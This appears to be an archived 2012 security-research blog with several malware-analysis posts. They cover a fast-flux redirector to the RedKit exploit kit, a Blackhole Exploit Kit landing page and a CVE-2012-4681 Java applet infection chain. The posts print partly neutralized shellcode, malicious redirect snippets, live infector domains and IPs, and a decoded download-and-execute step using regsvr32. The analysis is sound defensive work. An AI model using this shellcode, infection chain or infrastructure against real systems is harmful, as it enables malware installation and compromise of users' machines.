HKLM\​System\​CurrentControlSet\​Control\​Terminal Server (TSUserEnabled )

At the time I got this only 3 AV products detected it:
Symantec                 : W32.Cridex
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Downloader.A
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
I uploaded samples to Virus Total to check/monitor RECENT detection ratio:
So the moral of the story is : With BHEK infector domains lasts max up to 2days, with landing pages changes per one click on the BHEK2 and hourly on previous version, while they started using network tools for protection & C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!

Sunday, September 16, 2012

A peek into "qaqipwel.ru" a Malicious Domain Redirector with Pseudo/Dynamic IP - Infector to RedKit Exploit Kit

This is a quicky, so please bare w/ it. The information might be important for the people who is handling the malware infector sites.

While handling a report lead to the RedKit Exploit Kit/Pack, I came to a domain who's actively redirecting users to the RedKit Exploit Kit's landing page.
This domain is qaqipwel.ru

It uses the pseudo dns for NS & A records to avoid blocking/tracking, currently is up and alive, and has a strong DNS network backbone for round-robin the IP/DNS address for the purpose to distribute malware Landing page or spam page distribution.
I tagged & checked this for only a couple days so far to confirm the redirection activities above. Here goes the details (Warning: This might be not too interesting for client security solution guys, and I am not going to discuss about RedKit Exploit itself in this post, please see this link for the details RedKit Exploit Kit Information--->>HERE)

The url provided by qaqipwel.ru is changed, currently is below:
h00p://qaqipwel.ru/count22.php
If you track it correctly you will ending up in these redirection - for the last 24hrs:
h00p://sa-wan.com/93020006.html // RedKit EK Landing Page
h00p://cestasefloresluana.com.br/30400006.html // RedKit EK Landing Page
h00p://mytabletcialis.com/ // Clialis/viagra site
h00p://goherdscan.com/  // Canadian Pharmacy
As PoC - When fetching the infector page you'll get many redirection tricks like: Case1
--15:35:30-- h00p://qaqipwel.ru/count22.php => `count22.php' Resolving qaqipwel.ru... 77.38.198.12 Connecting to qaqipwel.ru|77.38.198.12|:80... connected. HTTP request sent, awaiting response... 302 Location: h00p://sa-wan.com/93020006.html [following] --15:35:33-- h00p://sa-wan.com/93020006.html => `93020006.html' Resolving sa-wan.com... 72.167.232.75 Connecting to sa-wan.com|72.167.232.75|:80... connected.
Case2
--15:49:39-- h00p://qaqipwel.ru/count22.php => `count22.php.1' Resolving qaqipwel.ru... 77.90.120.34 Connecting to qaqipwel.ru|77.90.120.34|:80... connected. HTTP request sent, awaiting response... 200 Length: 146 [] 15:49:40 (0.00 B/s) - `count22.php' saved [146/146] HTTP/1.1 200 Server: Apache Content-Length: 142 Content-Type: Last-Modified: .., 16 ... 2012 06:42:12 GMT Accept-Ranges: bytes Server:nginx/0.8.34 Date:Sun, 16 Sep 2012 06:42:15 GMT X-Powered-By:PHP/5.3.2
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://goherdscan.com/";</script>
:
Case3 (via tor)
--2012-09-16 15:16:04-- h00p://qaqipwel.ru/count22.php Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 302 Location: h00p://cestasefloresluana.com.br/30400006.html [following] --2012-09-16 15:16:12-- h00p://cestasefloresluana.com.br/30400006.html Connecting to localhost (localhost)|::1|:8118... connected.
Case4
--2012-09-16 15:20:10-- h00p://qaqipwel.ru/count22.php Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 200 Length: 146 [] Saving to: `count22.php' 100%[=============>] 146 361B/s in 0.4s Last-modified header invalid -- time-stamp ignored. 2012-09-16 15:20:12 (361 B/s) - `count22.php' saved [146/146] $ cat count22.php
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://mytabletcialis.com/";</script>
:
If you lookup the domain registration it was mentioned these data:
IP: 62.84.60.2 INET: 62.84.60.0/22 AS: AS39824 ISP: ALMANET-AS JSC AlmaTV Country: Kazakhstan kz flag State/Region: Almaty City City: Almaty Latitude: 43.25 Longitude: 76.95
Which in the actual is like these ones:
PSEUDO A (IP) RECORDS DETECTED BY FACTS:
178.137.1.4
129.241.150.45
89.115.162.87
92.49.3.129
159.224.125.227
88.135.159.37
93.113.237.108
46.186.83.133
188.173.100.142
89.221.112.165
31.14.136.113
77.38.198.12
1.249.216.225
203.142.169.131
109.185.53.194
94.112.97.46
46.120.219.104
112.209.92.132
77.122.122.94
188.241.186.4
  :
  :
and so on...(last counted 233 IP's Sept 17th 2012)
And with the official DNS Registration was:
domain: QAQIPWEL.RU (A records per NS changes) nserver: ns1.chokode.com. 3545 IN A 217.144.208.27 nserver: ns2.chokode.com. 3469 IN A 175.194.252.182 nserver: ns3.chokode.com. 3394 IN A 87.110.121.10 nserver: ns4.chokode.com. 3394 IN A 178.155.43.251 nserver: ns5.chokode.com. 3600 IN A 111.184.220.233 nserver: ns6.chokode.com. 3394 IN A 94.53.46.22 state: REGISTERED, DELEGATED, UNVERIFIED person: Private Person registrar: REGGI-REG-RIPN admin-contact: http://www.webdrive.ru/webmail/ created: 2012.09.06 paid-till: 2013.09.06 free-date: 2013.10.07
While in actual you will get these Random DNS Records:
Domain Queried : qaqipwel.ru Tracing to qaqipwel.ru[a] via a.root-servers.net., maximum of 1 retries a.root-servers.net. (198.41.0.4) |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried |\___ a.dns.ripn.net [ru] (193.232.128.6) | |\___ ns1.chokode.com [qaqipwel.ru] (91.187.182.249) Got auth.answer | |\___ ns2.chokode.com [qaqipwel.ru] (46.229.107.36) Got auth.answer | |\___ ns3.chokode.com [qaqipwel.ru] (89.115.162.87) Got auth.answer | |\___ ns4.chokode.com [qaqipwel.ru] (109.87.58.1) Got auth.answer | |\___ ns6.chokode.com [qaqipwel.ru] (94.41.4.214) Got auth.answer | \___ ns5.chokode.com [qaqipwel.ru] (89.115.162.87) (cached) |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried |\___ b.dns.ripn.net [ru] (194.85.252.62) | |\___ ns6.chokode.com [qaqipwel.ru] (194.54.180.242) Got auth.answer | |\___ ns2.chokode.com [qaqipwel.ru] (46.211.255.80) Got auth.answer | |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) Got auth.answer | |\___ ns1.chokode.com [qaqipwel.ru] (180.149.212.148) Got auth.answer | |\___ ns3.chokode.com [qaqipwel.ru] (77.221.76.117) Got auth.answer | \___ ns5.chokode.com [qaqipwel.ru] (114.25.144.116) Got auth.answer |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried |\___ e.dns.ripn.net [ru] (193.232.142.17) | |\___ ns6.chokode.com [qaqipwel.ru] (89.102.91.73) Got auth.answer | |\___ ns5.chokode.com [qaqipwel.ru] (88.222.161.159) Got auth.answer | |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) (cached) | |\___ ns3.chokode.com [qaqipwel.ru] (180.149.212.148) (cached) | |\___ ns2.chokode.com [qaqipwel.ru] (93.105.30.91) Got auth.answer | \___ ns1.chokode.com [qaqipwel.ru] (89.40.57.110) Got auth.answer |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried |\___ f.dns.ripn.net [ru] (193.232.156.17) | |\___ ns6.chokode.com [qaqipwel.ru] (111.184.220.233) Got auth.answer | |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached) | |\___ ns3.chokode.com [qaqipwel.ru] (46.160.95.107) Got auth.answer | |\___ ns5.chokode.com [qaqipwel.ru] (111.34.117.125) Got auth.answer | |\___ ns2.chokode.com [qaqipwel.ru] (109.87.58.1) (cached) | \___ ns4.chokode.com [qaqipwel.ru] (37.205.75.204) Got auth.answer |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried \___ d.dns.ripn.net [ru] (194.190.124.17) |\___ ns3.chokode.com [qaqipwel.ru] (75.64.99.215) Got auth.answer |\___ ns5.chokode.com [qaqipwel.ru] (89.39.7.1) Got auth.answer |\___ ns4.chokode.com [qaqipwel.ru] (89.40.57.110) (cached) |\___ ns6.chokode.com [qaqipwel.ru] (91.187.181.6) Got auth.answer |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached) \___ ns2.chokode.com [qaqipwel.ru] (89.102.91.73) (cached)
↑Please see how the IP ADDRESS of each NS host are chnaging↑ Additionally some DNS delegation information:
+-d.dns.ripn.net (194.190.124.17) | +-e.dns.ripn.net (193.232.142.17) | | +-f.dns.ripn.net (193.232.156.17) | | | +-ns.ripn.net (194.85.105.17) | | | | +-ns2.nic.fr (192.93.0.4) | | | | | +-ns5.msk-ix.net (193.232.128.6) | | | | | | +-ns9.ripn.net (194.85.252.62) | | | | | | |
This infected url was uploaded to the urlquery here--->>[CLICK] And currently we have a weak detection of qaqipwel.ru in the blacklist: Conclusion: Such professional malicious redirector provider is currently exist. The below domain names are the ones used for this evil purpose:
nujqamdi.ru axbuzyg.ru aldiplil.ru uqnymtyq.ru bawodnes.ru gezahcyg.ru cilcenok.ru vecvycte.ru irroxux.ru unxajen.ru meewxib.ru deqbyyq.ru byxkauv.ru qovizki.ru huenhaz.eu axbuzyg.ru kykufep.ru luxypuj.eu ( ↑ domains detected until by the time this blog is written)
The combination possibilities for filename "count$.php" was detected as per below:
count4.php count20.php count21.php count19.php count18.php count16.php count17.php count14.php count5.php count13.php count11.php count12.php count25.php count6.php count15.php ( ↑ landing page detected until by the time this blog is written)
Domain names can be changed and the IP addresses are pseudo/dynamically changed. We cannot depend on blacklist anymore to nail this kind of infectors.

Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

Well, currently #MalwareMustDie is in the hunting mode, so I joined the event, this is actually a report of the first case in hand which becoming an important matter in investigation of BHEK.
I received report of infection, and after looking a squid log I found the source
which is  203.91.113.6 and is "suspected" serving blackhole. 
Why I quoted that word is because I am about 95% sure of it.

Just arrived home from 6hrs driving trip, after setting freebsd for analysis mode,
setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The reported url at squid log url doesn't seem to exist anymore, 
looks like the parameter was changed which was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2
I tried to combine the latest blackhole possible parameters and finally managed to download the below url (via tor only..)
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489 => `main.php@page=3c23940fb7350489' Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Resolving bode-sales.net... 203.91.113.6 Connecting to bode-sales.net|203.91.113.6|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 68,856 40.80K/s 21:26:32 (40.74 KB/s) - `main.php' saved [68856] GET /main.php?page=3c23940fb7350489 HTTP/1.0 User-Agent: MalwareMustDieDieDieee/666.666.666 Accept: */* Host: bode-sales.net Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.3.3 Date: Sat, 15 Sep 2012 12:11:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.14 ....(blah)
The file itself is the obvious BHEK landing page obfuscated JS/Code for the research purpose I neutralized it here:-->>[PASTEBIN] And after deobfs'ed it found the Plugin Detection of blackhole - which also for the research purpose I neutralized it here:-->>[PASTEBIN] The first time I checked in Virus Total about this landing page was ZERO, now:
MD5: 88ebe56bca027174ab28406ddbafa2e6 File size: 67.2 KB ( 68856 bytes ) File name: main.php File type: HTML Detection: 4 / 42 Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago ) URL: ---------->>[VIRUS-TOTAL] Malware Name: McAfee : JS/Exploit-Blacole.gq Symantec : Trojan.Malscript McAfee-GW-Edition : JS/Exploit-Blacole.gq Kaspersky : Trojan-Downloader.JS.Expack.adl
Like the previously reported in this blog-->[HERE] basically exploit vector of the plugin detect is unchanged, and in our case now we have 6(six) exploitations.
(The details is exactly asp per reported beforehand) 1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9] 2. PDF File AcroPDF.PDF 3. DOMDocs Msxml2.XMLHTTP 4. Java Exploit javaplugin.191_40 5. Java webStart exploit JavaWebStart.isInstalled *) I thought this time is without the SWF Exploit infector A friend advised me and then I realized there is a 6. SWF Exploit (field.swf)-->[VT:20/42]
However we have the slight changes in the shellcode. I am a big fan of shellzer, a PyDbg base shellcode decoder, and using it often to many of my projects. We have a problem figuring this blog's shellcode using shellzer. So I cracked it manually, if some of you have same problem I think I am sharing this howto as reference: The above infector exploit sets the has the mission to execute the below shellcode:
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 e9 56fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 af 1c Ocad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b 5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 2O cO b4 d6 d7 d7a6 66 26 c4 bO d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44 4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d 1e 4b 1f 49 Oe 4d 15 19 28 28 *) PS: the above↑shellcode is neutralized
FYI, shellzer hangs if you pasted this code. I am not going into debugging details on WHY it hangs, let's focus to the point and solve the code.. Let's dump all of the strings first, you'll get something like this:
iiiiN ..u4._3 d.@0.@ f.^< t3,.. u..4$..uQ..LQV.u<.t5x .V.v @..; u.^.^$ K.F. ....h .......XPj@h ...P. PU...^ .hon..hurlmT ...a .r.. ...\$ AQj.j.SWj. j... ?.u.G /p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((
We won't know what this is all about except the looks of obfuscated URL - in the last line, so I scan it to get below signatures & info..
msf.fnstenv_mov: D9EED97424F45B817313 msf.jmp_call_additive: EB0C5E56311EAD01C3 msf.noupper: EB195E8BFE83C7008BD7 msf.shikata_ga_nai: DAD729C9B15AD97424F4 msf.single_static_bit: EB655E31ED83E10183E301 msf.countdown: FFC15E304C0E07E2FA msf.call4_dw: FFC05E81760E CCCCCC.xor: 434343434343EB0F5B33C966B9 77efe4.xor: 304500454975F9EB00 CCCC_INC_EBX_Slide: 43434343 XXXX_pop_eax_start: 58585858 7_push_PSQRVWU: 505351525657559CE8 push_user32: 68333200006855736572 push_urlmon: 686F6E00006875726C6D push_shell32: 686C333200687368656C edi_seh_k32: 33FF64FF37648927FF07EBE8 peb_k32: 64A1300000008B400C8B701C hasher.ror7: 3AD67408C1CB0703DA40 E9Eb.hasher.rol3xor: C1C20332104080380075F5 didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC
By this I guessed the API method of urlmon.dll, and others was used to the code.. but couldn't detect any kernel32.dll API yet.. Let's skip it for a while..Now is time to bruteforce(bf) the code, you can use any tools available and try some bf logic! :-) Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1 $regsvr32 -s $hwpbt$i.dll *) which further $h lead to temp dir strings & $i leads to null values so I put 0 in it.
The story is urlmon.dll is being called to download malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1" save as %Temp%wpbt0.dll, execute, register it with "regsvr32 -s" command in your PC. Looks like we have a slight changes in shellcode API for the usage of calls from non kernel32.dll. This is different point compares to previous BHEK shellcode, So let's see what payload it is (using tor) and saved it as per malware scheme wanted it.
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 200 OK Length: 143207 (140K) [application/x-msdownload] Saving to: `wpbt0.dll' 100%[======>] 143,207 44.5K/s in 3.1s 2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]
It is a PE binary with the below analysis:
Hexing first sector: 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP.... 0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2.... 00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B.............. 00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@......... 00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................ ↑Quick reversing it...too seek some clue.. [0x00000000:0x00400000]> d 0x00000000 (01) 4d DEC EBP 0x00000001 (01) 5a POP EDX 0x00000002 (01) 90 NOP 0x00000003 (02) 0003 ADD [EBX], AL 0x00000005 (02) 0000 ADD [EAX], AL 0x00000007 (03) 000400 ADD [EAX+EAX], AL 0x0000000a (02) 0000 ADD [EAX], AL 0x0000000c (01) ff DB 0xff 0x0000000d (02) ff00 INC DWORD [EAX] 0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH 0x00000015 (02) 0000 ADD [EAX], AL 0x00000017 (03) 0040 00 ADD [EAX+0x0], AL : : ーーーーーtastes like a packer trace..ーーーー 0x00000034 (02) 0000 ADD [EAX], AL 0x00000036 (02) 0000 ADD [EAX], AL 0x00000038 (02) 0000 ADD [EAX], AL 0x0000003a (02) 0000 ADD [EAX], AL 0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0 0x0000003f (02) 000e ADD [ESI], CL 0x00000041 (01) 1f POP DS 0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e 0x00000047 (02) cd 21 INT 0x21 0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01 0x0000004e (01) 54 PUSH ESP 0x0000004f (05) 68 69732070 PUSH 0x70207369 0x00000054 (02) 72 6f JB 0x000000c5 ; 1 : : PE Summary Entry Point: 0x1000 at section: .code CRC Fail: Claimed: 0 Actual: 185076 Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW! Packer: PureBasic 4.x -> Neil Hodgson Compiler: Microsoft Visual C++ 5/6 Sections: .code 0x1000 0x2775 10240 .teXT 0x4000 0xc335 50176 .rdata 0x11000 0x1a0f 7168 .data 0x13000 0x1218 2560 .rsrc 0x15000 0x115c 4608 Auto reverse first block and ...got the loops :-P [0x401000L] push 0x0 [0x401005L] push 0x413998 [0x40100aL] call 0x404070L [0x40100fL] add esp 0xc [0x401014L] push 0x0 : loop : [0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it! [0x40167aL] fstp st0 [0x40167fL] fild [0x413a08] [0x401681L] fmul [0x413040] [0x401687L] sub esp 0x4 [0x40168dL] fstp [esp] Calls: Complete calls listed here:--->>[PASTEBIN] With the calls summary as per below: Get system env, opening /exec files(by original C code), opening thread, using timer.bitmap object manipulation, GUI operations, using winsock, creation of TLS, creation of semaphores
↑OK, looks strange enough, let's reverse it well, I used radare2. You can use anything you like, if you reversed it correctly you'll find the below malicious API commands inside of the packed parts of the sample (tips, unpacked it first):
CopyFileW (lpExistingFileName: "%Temp%wpbt0.dll", lpNewFileName: "%ApData%\KB00725031.exe", bFailIfExists: 0x0) CreateRemoteThread (hProcess: 0x68, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x12032f0, lpParameter: 0x1200000, dwCreationFlags: 0x0, lpThreadId: 0x0)
So we have a self copy operations and foreign memory injection here. Yes, let's use sandbox to quickly confirm it:
Malicious Processes 1960 c:\test\sample.exe (wpbt0.dll) 328 c:\documents and settings\user\application data\kb00725031.exe
Yes it dropped malicious malware kb00725031.exe - and somehow I remembered this filename a while ago. I searched & found it here --->>[LINK] (It will be another story of long history for the detail of this drop) Let's continue, Virus Total detection shows this detection when I found the payload 1st time:
AntiVir : TR/Buzus.HT.11 AhnLab-V3 : Trojan/Win32.Jorik Sophos : Mal/EncPk-AFN Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2 Kaspersky : Trojan.Win32.Jorik.Foreign.aa Microsoft : VirTool:Win32/CeeInject.gen!HT Comodo : UnclassifiedMalware
Now is becoming:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3 File size: 139.9 KB ( 143207 bytes ) File name: wpbt0.dll File type: Win32 EXE Detection : 9 / 41 Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago ) URL:-------->>>[CLICK/VIRUS-TOTAL] Malware Name: VIPRE : Trojan.Win32.Generic!BT (NEW) AntiVir : TR/Buzus.HT.11 (NEW) AhnLab-V3 : Trojan/Win32.Jorik ESET-NOD32 : a variant of Win32/Injector.WNM (NEW) Sophos : Mal/EncPk-AFN Microsoft : VirTool:Win32/CeeInject.gen!HT Symantec : Trojan.ADH.2 (NEW) Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2 Comodo : UnclassifiedMalware
Well it supposed to connect to internet, let's carefully run it a bit :-) Well it works as per expected, & starting to communicate to mothership - in 146.185.220.34! Below is my record in UDP traffic:
Req: 00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun 00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour 00000020 02 72 75 00 00 01 00 01 .ru..... Ans: 00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun 00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour 00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........ 00000030 0e 0f 00 04 92 b9 dc 22 ......."
Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34
I bet it does some more malicious stuffs as per refered analysis above. By the way the network info of the mothership:
inetnum: 146.185.220.0 - 146.185.220.255 netname: mdsru-net descr: MDS LTD. country: RU org: ORG-Ml192-RIPE admin-c: AV6782-RIPE tech-c: VA2854-RIPE status: ASSIGNED PA mnt-by: mdsru-mnt source: RIPE # Filtered organisation: ORG-Ml192-RIPE org-name: MDS ltd. org-type: OTHER abuse-mailbox: info@mdsnet.org address: Sofia Kovalevsaja st. 22 address: 620242 Ekaterinburg address: Russian Federation mnt-ref: mdsru-mnt admin-c: AV6782-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered person: Andrey Voronov address: 1st Magistralny blind alley address: 24, BC "The Yard" address: Moskow abuse-mailbox: info@mdsnet.org address: Russian Federation phone: +74957392422 nic-hdl: AV6782-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered person: Vlad Abramov address: 1st Magistralny blind alley address: 24, BC "The Yard" address: Moskow abuse-mailbox: info@mdsnet.org address: Russia phone: +74957392422 nic-hdl: VA2854-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered
While the landing page is in this network:
inetnum: 203.91.112.0 - 203.91.119.255 netname: G-Mobile descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1, descr: Ulaanbaatar 211213, Mongolia country: MN admin-c: TG154-AP tech-c: TG154-AP route: 203.91.113.0/24 descr: G-Mobile Subnet origin: AS24559 mnt-by: MAINT-MN-WIRELESSCOM changed: tulga@g-mobile.mn 20090205 source: APNIC person: Tulga Gandavaa nic-hdl: TG154-AP e-mail: tulga@g-mobile.mn address: G-Mobile Corporation, address: Chingeltei district 1st khoroo, Baga toiruu - 3/9 address: Ulaanbaatar, Mongolia phone: +976-98101111 fax-no: +976-11-311195 country: MN changed: tulga@g-mobile.mn 20070111 mnt-by: MAINT-MN-G-MOBILE ↑There are four more domains hosted in the same IP, there will be variation - of possibilities for spam links to this infector.
This cases malware family photograph:

Conclusion: The moral of this story is, the shellcode format of BHEK is starting to change. the usual kernel32.dll API based calls is becoming undetected, yet it downloaded the dropper binary containing the copy API now. Is a slight modification but it successfully fools some automation scheme. Further investigation made me realize the reason, which are written in "Bypassing Export address table Address Filter(EAF)" which can be viewed--->>[HERE] And additionally a friend advised the crash PoC of it in here -->>[HERE] Maybe shellzer must be patched for handling this new type of shellcode. I must say, maybe I missed something, since most of reversing are done manually, so please sorry about it and please advice me in the comment area. I think some more other changes in BHEK distribution is on the run too. Let's keep our eyes stick to it and see what happen. BTW, the infected urls are all up and alive so please be careful with it. Malware MUST Die!!

Thursday, September 13, 2012

Once upon a time with 62.152.104.149's undetected CVE-2012-4681 HTML infector (+full set of JAR payload infection)

One day I when tracing the php injected infector code I bumped to a web site below:

With the following URL:
h00p://62.152.104.149/public/meeting/
It looks like a strange meeting download set files since jar java set looks so "attractive", like as they're yelling to me "click me... click me!" :-) So I decided to investigate further about this site, starting w/this page. The HTTP communications : As per pic above it's suppose to be :
Apache/2.2.17 (Fedora) Server at 62.152.104.149 Port 80
Let's see whether it really is the Apache side original index..
GET /public/meeting/ HTTP/1.1 User-Agent: MalwareMustDieBuilt libcurl/7.21.4 zlib/1.2.5 Host: 62.152.104.149 Accept: */* HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 11:46:06 GMT Server: Apache/2.2.17 (Fedora) Content-Length: 1726 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /public/meeting</title> </head> <body> <h1>Index of /public/meeting</h1> :(blah blah)
It is real, so in directory of /public/meeting/ the claimed files looks exists.. I am not trusting any infection related service that easy.. is a habit.. Just fetch as much files as I can & found the /public/meeting/ has no further files except what I already got. Also found this web server contains some base security setting flaws which I am not going to expose it here, I assume those were the reason the malicious files were uploaded. Script kiddies.. BTW, for the server admin, the uploaded date was Aug 30th, please check your log around that time, some SQLi will cause some error_log in Apache (based on my experience) What malicious scheme is it? If we go back to the directory contents people are tend to click the known html file, in out example is notice.html Let's grab it:
--20:24:12-- h00p://62.152.104.149/public/meeting/notice.html => `notice.html' Connecting to 62.152.104.149:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,222 (1.2K) [text/html] 100%[====================================>] 1,222 --.--K/s 20:24:13 (23.18 MB/s) - `notice.html' saved [1222/1222]
It contains the code like this -->>[CLICK] (PS: I neutralized some characters so the text code will not infected you) This code is having 3 major steps:
1. To execute Javascript file "deployJava.js" to deploy JRE v1.7 in your PC (if you are detected using IE & in case you don't have one) Below is the snipcode: 2. Executing malicious applet "applet.jar" by passing the initial parameter via this browser as per coded below: 3. As per ↑pic above, using IFRAME to execute the download of "feq.html" file, which feq.html will be explained below eventually. *) those files "deployJava.js", "feq.html" and "applet.jar" are in same dir.
What is inside of the applet.jar? It contains the code like this:---->>[CLICK] (PS: I neutralized some characters so the text code will not infected you) applet.jar is containing ex-ZeroDay CVE-2012-4681 flaw, easiest way to recognize it by grep'ing the below strings in code:
java.security.ProtectionDomain java.security.Permissions java.security/cert.Certificate setSecurityManager file:/// sun.awt.SunToolkit getField
Exploit Code Grepped Result Pic: ↑Accordingly we know the infector url scheme goes like these below steps:
1. Attempting user to click the notice.html 2. Making sure the browser is IE & then 3. Installing the zeroday flaw version of java in user's PC 4. Executing the applet.jar to exploit JRE to exec batch file to - download feq.html to PC w/name SVCHOST.EXE and execute it.
The payload is "feq.html", a binary file camouflaged as HTML one. The file itself looks like this SVCHOST.EXE after being dropped to your PC: Let's analyze this binary a bit:
